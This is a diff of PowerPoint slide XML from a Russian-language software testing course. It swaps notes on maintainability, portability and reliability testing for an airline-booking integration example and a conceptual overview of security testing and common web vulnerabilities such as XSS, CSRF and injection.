-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>сопровождаемости</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>maintainability</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
-              <a:t> testing</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>).</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>Сопровождаемость</a:t>
+              <a:t> разном окружении.</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>Пример</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t> - </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>аспект качества в большей степени не внешний, а внутренний.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Он важен не столько конечным пользователям, не столько потребителям программы, сколько самим разработчикам и ее </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>тестировщикам</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Все его </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>подхарактеристики</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> тестированию практически не поддаются, и для них применяются какие-то другие способы контроля качества, как правило, аналитические. Статический анализ кода, код </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>ревью</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>, анализ документации и так далее.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Тестирование переносимости (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>portability</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
-              <a:t> testing</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>) – тестирование с целью определить переносимость ПО.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Программа должна уметь работать в различных окружениях (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>adaptibility</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>), она должна быть достаточно </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" sz="1200" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>проста в установке </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>installability</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>), она должна </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" sz="1200" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>работать одновременно с другими программами</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> и не мешать им (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>coexistence</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>), и они должны не мешать ей, конечно же.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>И, наконец, хорошая программа должна предоставлять возможность пользователю перейти с какого-то другого аналогичного программного обеспечения на использование этой программы – </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" sz="1200" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>замена другого ПО данным</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>replaceability</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>). То есть предоставить какие-то возможности по миграции, чаще всего по миграции данных.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>Reliability </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
-              <a:t>testting</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
+              <a:t> взаимодействия двух и более систем:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
             <a:r>
               <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>(тестирование надежности)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>К надежности относятся такие </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>подхарактеристики</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>, как </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" sz="1200" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>зрелость </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>maturity</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>), которая является обратной величиной к частоте отказов, и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" sz="1200" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>устойчивость к отказам</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>fault</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>tolerance</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>), то есть способность системы не реагировать на какие-то внутренние проблемы. В том числе сюда относится транзакционная целостность и способность к </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" sz="1200" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>восстановлению работоспособности при отказах</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>recoverability</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>). То есть если у вас сервер упал, то он должен самостоятельно восстановиться, вернуть все нужные данные, ничего не потерять, и продолжить работу.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>Volume testing (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>тестирование вместимости</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> – тестирование, направленное на определения объема</a:t>
-            </a:r>
+              <a:t>У каждой авиакомпании есть возможность бронировать билеты, притом у каждой из них разные требования:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
             <a:r>
               <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t> данных, которые может обрабатывать система </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" err="1" smtClean="0"/>
-              <a:t>и\</a:t>
-            </a:r>
+              <a:t>«Турецкие авиалинии» не требуют предоплаты;</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
             <a:r>
               <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t> или объем данных, которые могут находиться в базе данных и т.д.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>«МАУ» нужна предоплата в размере 20% от общей стоимости;</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>Установочное тестирование – процесс тестирования на определение </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" err="1" smtClean="0"/>
-              <a:t>устанавливаемости</a:t>
+              <a:t>«</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
+              <a:t>airberlin</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t> системы.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Конфигурационное тестирование – см. Тестирование переносимости.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
+              <a:t>» обязательно требует подтверждения номера телефона того, на кого оформляется бронирование.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>Есть сайты всех перечисленных авиакомпаний.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>Есть сайт турфирмы. На нем есть возможность заказывать билеты или бронировать. На этом сайте можно забронировать билеты всех перечисленных авиалиний, не переходя на сайт авиакомпании.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -2651,23 +1195,253 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>https://ru.wikipedia.org/wiki/%D0%A1%D1%82%D1%80%D0%B0%D1%82%D0%B5%D0%B3%D0%B8%D1%8F_%D1%82%D0%B5%D1%81%D1%82%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F_%D0%BF%D0%BE_%D0%BF%D1%80%D0%B8%D0%BD%D1%86%D0%B8%D0%BF%D1%83_%C2%AB%D0%91%D0%B5%D0%BB%D0%BE%D0%B3%D0%BE_%D1%8F%D1%89%D0%B8%D0%BA%D0%B0%C2%BB</a:t>
-            </a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
+              <a:t>Тестирование безопасности</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> - это стратегия тестирования, используемая для проверки безопасности системы, а также для анализа рисков, связанных с обеспечением целостного подхода к защите приложения, атак хакеров, вирусов, несанкционированного доступа к конфиденциальным данным.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>Общая стратегия безопасности основывается на следующих</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>основных принципах:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>• конфиденциальность</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>• целостность</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>• идентификация</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>• авторизация</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>• доступность</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>• невозможность</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t> отказаться от авторства</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
             <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
           </a:p>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Структурное тестирование (</a:t>
+              <a:t>В настоящее время наиболее распространенными видами </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
+              <a:t>уязвимости в безопасности программного обеспечения</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> являются:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>• </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
+              <a:t>XSS (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
+              <a:t>Cross-Site</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
+              <a:t>Scripting</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> - это вид уязвимости программного обеспечения (</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>тестирование</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> методом белого ящика) может выполняться на всех уровнях тестирования. Структурные методы тестирования лучше всего использовать после методов разработки тестов на основе спецификации, чтобы измерить тщательность тестирования, используя измерения покрытия структуры программы. Покрытие – это часть структуры программы, которая была охвачена тестированием, выраженная в процентах. </a:t>
+              <a:t>Web</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> приложений), при которой, на генерированной сервером странице, выполняются вредоносные </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>скрипты</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>, с целью атаки клиента.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>• </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
+              <a:t>XSRF / CSRF (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
+              <a:t>Request</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
+              <a:t>Forgery</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> - это вид уязвимости, позволяющий использовать недостатки HTTP протокола, при этом злоумышленники работают по следующей схеме: ссылка на вредоносный сайт </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>установливается</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> на странице, пользующейся доверием у пользователя, при переходе по вредоносной ссылке выполняется </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>скрипт</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>, сохраняющий личные данные пользователя (пароли, платежные данные и т.д.), либо отправляющий СПАМ сообщения от лица пользователя, либо изменяет доступ к учетной записи пользователя, для получения полного контроля над ней.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>• </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
+              <a:t>Code</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
+              <a:t>injections</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
+              <a:t> (SQL, PHP, ASP и т.д.)</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> - это вид уязвимости, при котором становится возможно осуществить запуск исполняемого кода с целью получения доступа к системным ресурсам, несанкционированного доступа к данным либо выведения системы из строя.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>• </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
+              <a:t>Server-Side</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
+              <a:t>Includes</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
+              <a:t> (SSI) </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
+              <a:t>Injection</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> - это вид уязвимости, использующий вставку серверных команд в HTML код или запуск их напрямую с сервера.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>• </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
+              <a:t>Authorization</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
+              <a:t>Bypass</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> - это вид уязвимости, при котором возможно получить несанкционированный доступ к учетной записи или документам другого пользователя</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -2675,734 +1449,208 @@
           </a:p>
           <a:p>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Если покрытие не равно 100%, то необходимо разрабатывать дополнительные тесты для покрытия пропущенных участков программы.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>На всех уровнях тестирования могут использоваться инструментальные средства для измерения покрытия кода.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Техника Белого ящика включает в себя следующие методы определения покрытия:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:buFontTx/>
-              <a:buChar char="-"/>
+              <a:rPr lang="en-US" b="1" u="sng" dirty="0" smtClean="0"/>
+              <a:t>XSS </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" u="sng" dirty="0" smtClean="0"/>
+              <a:t>атаки</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" b="0" u="none" dirty="0" smtClean="0"/>
+              <a:t>http://www.thegeekstuff.com/2012/02/xss-attack-examples/</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" b="0" u="none" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" b="0" u="none" dirty="0" smtClean="0"/>
+              <a:t>http://forum.antichat.ru/thread20140.html</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" b="0" u="none" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="ru-RU" b="0" u="none" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" u="sng" dirty="0" smtClean="0"/>
+              <a:t>Варианты</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" u="sng" baseline="0" dirty="0" smtClean="0"/>
+              <a:t> ошибок безопасности</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="228600" indent="-228600">
+              <a:buAutoNum type="arabicParenR"/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t> п</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>окрытие операторов</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:buFontTx/>
-              <a:buChar char="-"/>
+              <a:rPr lang="ru-RU" b="0" u="none" dirty="0" smtClean="0"/>
+              <a:t>Программка </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="0" u="none" dirty="0" err="1" smtClean="0"/>
+              <a:t>BookLibrary</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="0" u="none" dirty="0" smtClean="0"/>
+              <a:t>. </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="0" u="none" dirty="0" err="1" smtClean="0"/>
+              <a:t>Скрипт</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="0" u="none" dirty="0" smtClean="0"/>
+              <a:t> вводится</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="0" u="none" baseline="0" dirty="0" smtClean="0"/>
+              <a:t> в поля для книги.</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" b="0" u="none" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="228600" indent="-228600">
+              <a:buAutoNum type="arabicParenR"/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t> покрытие решений</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:buFontTx/>
-              <a:buChar char="-"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t> покрытие условий</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:buFontTx/>
-              <a:buChar char="-"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t> комбинаторное покрытие условий</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:buFontTx/>
-              <a:buChar char="-"/>
-            </a:pPr>
-            <a:endParaRPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr rtl="0"/>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t>Покрытия операторов </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>подразумевает </a:t>
-            </a:r>
-            <a:r>
